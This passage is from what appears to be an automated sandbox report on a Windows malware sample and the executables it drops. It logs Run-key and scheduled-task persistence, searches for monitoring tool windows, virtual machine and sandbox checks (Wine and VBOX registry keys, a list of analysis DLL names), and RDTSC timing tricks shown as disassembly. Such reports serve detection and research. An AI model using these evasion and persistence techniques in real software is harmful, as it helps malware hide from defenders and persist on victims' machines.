                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 955e8e90f4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 955e8e90f4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b6866cbf49.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b6866cbf49.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fa1ce2a324.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fa1ce2a324.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1C858 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00B1C858
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Contain functionality to detect virtual machines
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: VMwareVM VMwareVMware VMwareVMware 7_2_00402BEB
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9664
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeSystem information queried: FirmwareTableInformation
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: 4508a44a11.exeBinary or memory string: DIR_WATCH.DLL
                          Source: 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                          Source: 4508a44a11.exeBinary or memory string: SBIEDLL.DLL
                          Source: 4508a44a11.exeBinary or memory string: API_LOG.DLL
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C557 second address: 111C55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111C55B second address: 111C579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6CD925506h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120231 second address: 1120255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120255 second address: 1120259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120259 second address: 1120269 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120269 second address: 112026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112026E second address: 11202AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FB6CC860F26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2BC7h], edx 0x00000015 push 00000003h 0x00000017 mov dh, FDh 0x00000019 push edi 0x0000001a push edx 0x0000001b mov dword ptr [ebp+122D1E18h], eax 0x00000021 pop ecx 0x00000022 pop edx 0x00000023 push 00000000h 0x00000025 push 00000003h 0x00000027 mov dword ptr [ebp+122D1E72h], edi 0x0000002d call 00007FB6CC860F29h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202AA second address: 11202AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202AE second address: 11202B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202B2 second address: 11202B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202B8 second address: 11202BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202BD second address: 11202E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD925500h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnl 00007FB6CD925500h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202E0 second address: 11202FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jne 00007FB6CC860F2Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11202FE second address: 1120318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925503h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120318 second address: 112032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FB6CC860F28h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112032E second address: 11203AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FB6CD9254F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d cmc 0x0000000e lea ebx, dword ptr [ebp+12455071h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FB6CD9254F8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e adc ecx, 6FA1100Eh 0x00000034 pushad 0x00000035 mov ecx, dword ptr [ebp+122D3A2Ah] 0x0000003b jbe 00007FB6CD92550Fh 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FB6CD925507h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push ebx 0x0000004d pop ebx 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11203AF second address: 11203B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120411 second address: 1120415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11205C7 second address: 11205D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Ah 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11205D5 second address: 11205FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FB6CD9254FCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11205FB second address: 11205FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11205FF second address: 1120614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925501h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120614 second address: 1120635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jne 00007FB6CC860F2Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DDD9 second address: 113DDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD925503h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DDF7 second address: 113DDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DDFB second address: 113DE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FB6CD9254F8h 0x0000000e jno 00007FB6CD9254FCh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FB6CD9254F8h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE22 second address: 113DE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007FB6CC860F26h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE2E second address: 113DE38 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB6CD9254F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DF5A second address: 113DF64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB6CC860F26h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E295 second address: 113E299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E299 second address: 113E2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CC860F2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB6CC860F2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E2C0 second address: 113E2CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E531 second address: 113E535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E535 second address: 113E53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E938 second address: 113E93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E93C second address: 113E954 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6CD9254FCh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E954 second address: 113E987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F34h 0x00000007 jp 00007FB6CC860F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jo 00007FB6CC860F26h 0x0000001c jo 00007FB6CC860F26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E987 second address: 113E98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EC00 second address: 113EC22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB6CC860F35h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EC22 second address: 113EC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EC27 second address: 113EC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FB6CC860F2Fh 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135160 second address: 1135164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112A74 second address: 1112A88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB6CC860F26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FB6CC860F2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
